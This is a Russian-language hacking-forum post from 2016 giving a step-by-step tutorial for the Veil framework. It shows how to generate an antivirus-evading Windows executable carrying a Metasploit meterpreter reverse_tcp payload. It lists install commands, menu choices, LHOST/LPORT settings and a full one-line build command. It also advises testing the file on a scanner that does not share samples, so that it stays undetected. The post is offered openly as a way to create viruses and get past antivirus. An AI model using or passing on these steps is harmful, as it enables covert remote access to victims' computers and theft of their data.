Veil

Тема в разделе "Взлом", создана пользователем vadim998, 9 дек 2016.

  1. Гость, давай поддержим форум вместе, делись информацией с друзями через кнопки в блоке "Поделиться в социальных сетях"

    Скрыть объявление
Tags:
  1. vadim998

    vadim998 Избранный

    
    Регистр:
    22 сен 2013
    Сообщения:
    260
    Лайки:
    235
    Дизлайки:
    0
    Баллы:
    130
    Veil-тулза из сборки прославленной Kali Linux. Функционал проги-создание вирусов,обход защиты антивирусов и получение данных в среде Metasploit.
    1.Загрузка и установка:
    Код:
    wget https://github.com/ChrisTruncer/Veil/archive/master.zip
    
    unzip master.zip
    
    cd Veil-master/setup
    
    cd ..
    
    ./setup.sh
    apt-get update
    
    apt-get install veil
    
    Запуск из командной строки ./Veil
    далее вводим use
    [​IMG]

    Теперь Veil предлагает нам выбрать тело вируса с которым хотим работать. В этом случае я выбрал python/b64VirtualAlloc набрав "18"
    [​IMG]
    Когда загрузка тела вируса закончиться, введите команду — generate. На данном этапе можно задать кучу специфических параметров, но в рамках этой статьи будем использовать значения по-умолчанию.
    [​IMG]
    Далее необходимо выбрать шеллкод, который будет использоваться, мы выбираем msfvenom набрав 1
    [​IMG]
    Далее указываем некоторые детали-типа хоста и прочего.
    [​IMG]

    Код:
    Enter metasploit payload: “windows/meterpreter/reverse_tcp“
    Код:
    
    
    Код:
    
    
    Enter value for ‘LHOST’, [tab] for local IP: “192.168.69.69″
    
    Enter value for ‘LPORT’: “443“

    Подождав пока сгенерируется шеллкод получаем запрос на присвоение имени файлу,в данном примере дадим имя-undetectable
    [​IMG]
    Далее нам предложат выбрать Pyinstaller.не замарачиваемся и выбираем— 1
    [​IMG]
    Вот и всё-наш билд готов и находится по адресу исполняемый .exe файл в папке /root/Veil-master/output/compiled/
    [​IMG]

    Теперь можно и проверить его через vscan.novirusthanks.org. Главное-установить галочку "Do not distribute the sample".
    [​IMG]
    При удачной компиляции получим чистый файл))
    [​IMG]
    P.S: также всё можно проделать и одной командой :
    ./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443
    Удачи.